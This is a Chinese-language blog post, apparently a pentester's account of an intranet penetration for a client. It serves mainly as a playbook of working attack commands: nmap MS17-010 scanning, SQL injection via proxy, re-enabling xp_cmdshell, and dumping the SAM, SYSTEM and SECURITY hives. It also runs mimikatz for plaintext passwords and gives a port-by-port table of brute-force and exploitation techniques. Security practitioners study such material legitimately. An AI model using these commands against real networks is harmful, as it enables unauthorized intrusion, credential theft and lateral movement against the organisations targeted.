记一次内网渗透

作者: admin 分类: 渗透测试 发布时间: 2017-09-11 11:16

因为一客户的关系,需要搞定几个主站,收集一波信息下来,发现有waf,防火墙。略显棘手,找了一下子域,很偶然的机会挖到了一个任意文件上传,曲线救国路线开始,运气很好,在那几个主站在同一个网段。所以很顺利的搞定。

进入内网了,我一般走四条路,

1,走web继续搞webshell。

2,扫描弱口令,比如最喜欢的mssql,ipc$等。

3,主机层面的漏洞,比如ms17010。

4,熟悉内部拓扑,熟悉各种设备,翻密码。

至于大家常说的域渗透,工作组的渗透其实都差不多。

代理:

因为内外网隔离,只能使用proxifer+reGeog

主机发现:

nbtscan 192.168.1.0/24

arp -a

net view /domain

nmap -n -p445 –script smb-vuln-ms17-010 192.168.1.0/24 –open

端口扫描:

nmap -iL -F -p1-65535 192.168.1.0/24 或者是扫一些常见服务的端口

sl -bhpz -O c:\result2.txt -d 100 -t 80,1494,22,23,443,53,1723,8080,3389,1433,3306 175.45.177.1-175.45.178.254 

nishang的portscan

Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254

密码收集:

web.config很多sa,有时服务器的账户密码会在这个文件里面,mail的账户密码,登录数据库翻网站的账户密码,抓明文密码,抓hash(hash传递)

密码爆破:NTScan,Hscan,SQL链接工具。linux的话可以使用msf,hydra

由于之前跟同事搭建过等保三级网络,禁止ping,访问为端口级,一般是防火墙做了安全策略。

既然进入内网,防火墙就没作用了。该注入还是能注入。

python sqlmap.py -u “xxxxx” –proxy=socks5://127.0.0.1:5555

mssql恢复xp_cmdshell

错误:Error Message:在执行 xp_cmdshell 的过程中出错。调用 ‘CreateProcess’ 失败,错误代码: ‘5’。

EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;

hash导出

reg save hklm\sam c:\sam.hive & reg save hklm\system c:\system.hive & reg save hklm\security c:\security.hive

mimikatz.exe “”privilege::debug”” “”sekurlsa::logonpasswords full”” exit >> log.txt

常规端口:

端口号 端口说明 攻击技巧
21 ftp/tftp:文件传输协议 爆破\嗅探\溢出\后门
22 ssh:远程连接 爆破OpenSSH;28个退格
23 telnet:远程连接 爆破\嗅探
25 smtp:邮件服务 邮件伪造
53 DNS:域名系统 DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙
67/68 dhcp 劫持\欺骗
110 pop3 爆破
139 samba 爆破\未授权访问\远程代码执行
143 imap 爆破
161 snmp 爆破
389 ldap 注入攻击\未授权访问
512/513/514 linux r 直接使用rlogin
873 rsync 未授权访问
1080 socket 爆破:进行内网渗透
1352 lotus 爆破:弱口令\信息泄漏:源代码
1433 mssql 爆破:使用系统用户登录\注入攻击
1521 oracle 爆破:TNS\注入攻击
2049 nfs 配置不当
2181 zookeeper 未授权访问
3306 mysql 爆破\拒绝服务\注入
3389 rdp 爆破\Shift后门
4848 glassfish 爆破:控制台弱口令\认证绕过
5000 sybase/DB2 爆破\注入
5432 postgresql 缓冲区溢出\注入攻击\爆破:弱口令
5632 pcanywhere 拒绝服务\代码执行
5900 vnc 爆破:弱口令\认证绕过
6379 redis 未授权访问\爆破:弱口令
7001 weblogic Java反序列化\控制台弱口令\控制台部署webshell
80/443/8080 web 常见web攻击\控制台爆破\对应服务器版本漏洞
8069 zabbix 远程命令执行
9090 websphere控制台 爆破:控制台弱口令\Java反序列
9200/9300 elasticsearch 远程代码执行
11211 memcacache 未授权访问
27017 mongodb 爆破\未授权访问

如果是vsphere搭建的,大部分是用模板搭建,密码基本上一样,这种机器大部分也没什么价值的东西。

跟很多朋友交流,基本共识:只要会web渗透,基本会内网渗透,内网只不过多了些小技巧,把自己当成管理员,熟悉拓扑,熟悉业务会让你更快突破。


5条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注

标签云